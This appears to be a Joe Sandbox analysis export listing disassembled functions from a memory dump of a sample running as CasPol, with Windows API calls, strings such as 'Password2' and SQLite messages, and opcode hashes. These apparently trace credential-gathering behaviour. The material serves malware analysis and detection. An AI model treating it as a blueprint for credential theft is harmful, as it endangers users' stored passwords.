                                                                                                                                                                                                                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                                                                                    • API String ID: 408644273-3424043681
                                                                                                                                                                                                                    • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                                                    • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                                                    • String ID: C^@$X$ini
                                                                                                                                                                                                                    • API String ID: 714388716-917056472
                                                                                                                                                                                                                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                                                    • API String ID: 3492281209-168460110
                                                                                                                                                                                                                    • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                                    • API String ID: 275601554-2167791130
                                                                                                                                                                                                                    • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$_mbscat
                                                                                                                                                                                                                    • String ID: 3CD
                                                                                                                                                                                                                    • API String ID: 3951308622-1938365332
                                                                                                                                                                                                                    • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                                                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                                    • String ID: Password2
                                                                                                                                                                                                                    • API String ID: 2600922555-1856559283
                                                                                                                                                                                                                    • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                                                    • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-543337301
                                                                                                                                                                                                                    • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                                                    • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: rows deleted
                                                                                                                                                                                                                    • API String ID: 2221118986-571615504
                                                                                                                                                                                                                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041BCA4
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041BCEC
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                                                                                    • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                    • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                    • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                                                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                    • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                    • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00425850
                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00425933
                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                                                                    • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                                                    • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                                                    • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                    • API String ID: 2221118986-515162456
                                                                                                                                                                                                                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                    • API String ID: 3510742995-3459038510
                                                                                                                                                                                                                    • Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                                                    • Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                      • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                      • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3503910906-0
                                                                                                                                                                                                                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                                                    • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3798638045-0
                                                                                                                                                                                                                    • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                                                    • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                                                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                                                    • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4107816708-0
                                                                                                                                                                                                                    • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                                                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                                                                                    • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                                                                                    • strftime.MSVCRT ref: 00411476
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1886415126-0
                                                                                                                                                                                                                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                                                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen
                                                                                                                                                                                                                    • String ID: >$>$>
                                                                                                                                                                                                                    • API String ID: 39653677-3911187716
                                                                                                                                                                                                                    • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                                                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
